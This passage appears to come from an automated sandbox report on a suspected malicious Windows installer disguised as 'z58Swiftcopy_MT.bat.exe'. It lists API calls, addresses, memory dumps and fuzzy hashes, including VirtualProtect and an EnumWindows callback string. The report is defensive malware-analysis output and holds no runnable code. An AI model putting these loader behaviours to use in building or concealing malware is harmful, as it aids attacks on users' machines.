                                                                                                                                                                                                                                      • API ID: EnumErrorLastWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 14984897-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 00403063
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                                                                                                                                                                                                        • Part of subcall function 004063C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                                                                                                                                                                                                        • Part of subcall function 004063C3: wsprintfA.USER32 ref: 00406413
                                                                                                                                                                                                                                        • Part of subcall function 004063C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405C36
                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405709
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405717
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2111968516-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405F76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040FA1F,0040B8D8,00403246,0040B8D8,0040FA1F,004138D8,00004000,?,00000000,00403070,00000004), ref: 00405CED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,004032C2,0040A130,0040A130,004031C6,004138D8,00004000,?,00000000,00403070), ref: 00405CBE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                                                                                                                      • Instruction ID: 86bb3e2151b1fdd0dbac44507bcf00ea7ca2ece369def3772f3446380bdcc129
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAE08C3220825EABEF109E508C00EEB3B6CFB00361F144432FD10E7040E230E860ABB4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                                      • Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040236D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1096422788-0
                                                                                                                                                                                                                                      • Opcode ID: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
                                                                                                                                                                                                                                      • Instruction ID: 8896498bc3bf22cdd75c41d4cee83ceff5cc5a9cf36b2948d6df5d4522980b60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E08634B44308BADF10AFA19D49EAD3668AF41710F14403AFD547B0E2EEB844429B2D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,00420510,?,?,00405FAD,00420510,?,?,?,00000002,Call), ref: 00405F43
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                      • Instruction ID: 49134d8a29c384089d71c2fc87a48e1db8574b6415c3e00dd087e3758e4bfdf5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0EC3210420ABADF119E919D01FAB371DEB04350F004426BA45E4091D779D520AE54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: e7fa766cc053bfdbcc21595e48a1bcd3d4c0b026ba3eff1e1b85954f558f6b14
                                                                                                                                                                                                                                      • Instruction ID: ce3aa80a16c353682a4fc60f6c60757a41c4294f2dd63ac0650dc91194aad8f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7fa766cc053bfdbcc21595e48a1bcd3d4c0b026ba3eff1e1b85954f558f6b14
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1D0127270811197CB10DBA8AB4869D77A4EB80325B318137D515F21D1E6B9C945671D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040535D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040536C
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004053A9
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004053B0
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053D1
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004053E2
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 004053F5
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405403
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405416
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405438
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040544C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040546D
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040547D
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405496
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054A2
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040537B
                                                                                                                                                                                                                                        • Part of subcall function 0040418F: SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054BE
                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005292,00000000), ref: 004054CC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004054D3
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004054F6
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004054FD
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405543
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405577
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00405588
                                                                                                                                                                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040559D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,000000FF), ref: 004055BD
                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055D6
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405612
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405622
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405628
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405631
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040563B
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564F
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405668
                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405673
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405679
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                      • String ID: 0B
                                                                                                                                                                                                                                      • API String ID: 590372296-4132856435
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B55
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B60
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BAA
                                                                                                                                                                                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404BBD
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,00405134), ref: 00404BD6
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BEA
                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BFC
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404C12
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C1E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C30
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404C33
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C5E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C6A
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404CFF
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D2A
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3E
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404D6D
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D7B
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D8C
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404E89
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404EEE
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F03
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F27
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F47
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F5C
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F6C
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404FE5
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 0040508E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040509D
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050BD
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040510B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405116
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040511D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                                                                                      • Opcode ID: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                                                                                                                                                                                                      • Instruction ID: d82d2da19de6c08df5f7af85b096481c441aefc445292f149536e1611d4f21ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 080241B0A00209AFDB209F95DD85AAE7BB5FB84314F10417AF611BA2E1C7799D42CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404643
                                                                                                                                                                                                                                      • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 004046F4
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(Call,00420D30), ref: 00404731
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Call), ref: 0040473D
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                                                                                                                        • Part of subcall function 00405799: GetDlgItemTextA.USER32(?,?,00000400,00404786), ref: 004057AC
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharNextA.USER32(?,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharPrevA.USER32(?,?,762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 0040480D
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404828
                                                                                                                                                                                                                                        • Part of subcall function 00404981: lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                                                                                                                                                                                                        • Part of subcall function 00404981: wsprintfA.USER32 ref: 00404A27
                                                                                                                                                                                                                                        • Part of subcall function 00404981: SetDlgItemTextA.USER32(?,00420D30), ref: 00404A3A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: 0B$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$Call$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 2624150263-1464366572
                                                                                                                                                                                                                                      • Opcode ID: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                                                                                                                                                                                                      • Instruction ID: 615b1c7bc5a39f2962dd47e2389a1e1cc3dfb76fea7d39b1cb42eedec06edaaa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4A19FB1900209ABDB11EFA5CC85AAFB7B8EF85314F10843BF611B62D1D77C89418B69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001E76
